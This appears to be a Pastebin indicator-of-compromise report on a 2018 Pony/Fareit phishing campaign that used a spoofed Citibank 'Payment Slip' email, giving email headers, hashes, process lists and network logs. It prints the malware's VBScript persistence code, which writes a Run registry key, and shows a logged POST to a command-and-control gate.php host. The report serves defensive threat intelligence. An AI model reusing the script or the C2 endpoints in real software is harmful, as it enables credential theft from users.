Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Pony #Fareit #ACE
- https://pastebin.com/u0D14L5r
- FAQ:
- https://radetskiy.wordpress.com/?s=fareit
- attack_vector
- --------------
- email attach (ace) > exe > %temp%\subfolder\filename.exe
- email_headers
- --------------
- Received: from plesk2.qsoftweb.com (plesk2.qsoftweb.com [78.46.145.250])
- by mailsrv2.victim1.com (8.15.2/8.15.2) with SMTP id w9I9rvLr042922
- for <user01@org3.victim1.com>; Thu, 18 Oct 2018 12:54:08 +0300 (EEST)
- (envelope-from spoof@citicorp.com)
- Received: from webmail.edwise.pk (localhost [IPv6:::1])
- by plesk2.qsoftweb.com (Postfix) with ESMTPSA id 7CE3E20B62;
- Thu, 18 Oct 2018 05:44:02 -0400 (EDT)
- Date: Thu, 18 Oct 2018 10:44:02 +0100
- From: CITIBANK <spoof@citicorp.com>
- To: undisclosed-recipients:;
- Subject: Payment Slip - Payment remitted 15/10/2018
- X-Sender: spoof@citicorp.com
- User-Agent: Roundcube Webmail/1.3.6
- email_subjects
- --------------
- Payment Slip - Payment remitted 15/10/2018
- files
- --------------
- SHA-256 ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3
- File name Payment slip.ace
- File size 264.85 KB
- SHA-256 3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783
- File name Kakih > %temp%\subfolder\filename.exe
- File size 618.27 KB
- activity
- **************
- netwrk
- --------------
- 194.36.173.171 armansaykham.com POST /nonso/gate.php HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- 67.227.226.240 pornhouse.mobi GET /main.php?dir=//Virgin%20Babes%20First%20Sex&start=1&sort=1 HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- comp
- --------------
- [System Process] 0 TCP 194.36.173.171 80 TIME_WAIT
- filename.exe 2160 TCP 67.227.226.240 80 ESTABLISHED
- proc
- --------------
- "C:\Users\operator\Desktop\Payment slip.exe"
- "C:\Windows\System32\WScript.exe" "C:\tmp\subfolder\filename.vbs"
- "C:\tmp\subfolder\filename.exe"
- "C:\tmp\subfolder\filename.exe"
- C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\7710921.bat" "C:\tmp\subfolder\filename.exe" "
- vbs
- --------------
- filenameOn Error Resume Next
- Set WshShell = CreateObject("WScript.Shell")
- myKey = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Registry Key Name"
- Vbs ="C:\tmp\subfolder\filename.vbs"
- If WScript.Arguments.Count = 0 Then
- GG = second(now)
- WScript.Sleep 5000
- VV = second(now)
- Vbs = Vbs & " -FF"
- If Abs(VV-GG) => 5 then WshShell.RegWrite myKey,Vbs,"REG_SZ"
- WScript.Quit
- end if
- WshShell.Run """C:\tmp\subfolder\filename.exe"""
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 18.10.2018 17:32
- Registry Key Name c:\tmp\subfolder\filename.vbs 18.10.2018 17:32
- drop
- --------------
- C:\tmp\subfolder\filename.exe
- C:\tmp\subfolder\filename.vbs
- # # #
- https://www.virustotal.com/#/file/ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3/details
- https://www.virustotal.com/#/file/3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783/details
- https://analyze.intezer.com/#/analyses/52017eed-c2d4-4da9-be09-a1a57f09cfa5
- Harvests credentials from local FTP client softwares
- Harvests information related to installed mail clients
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement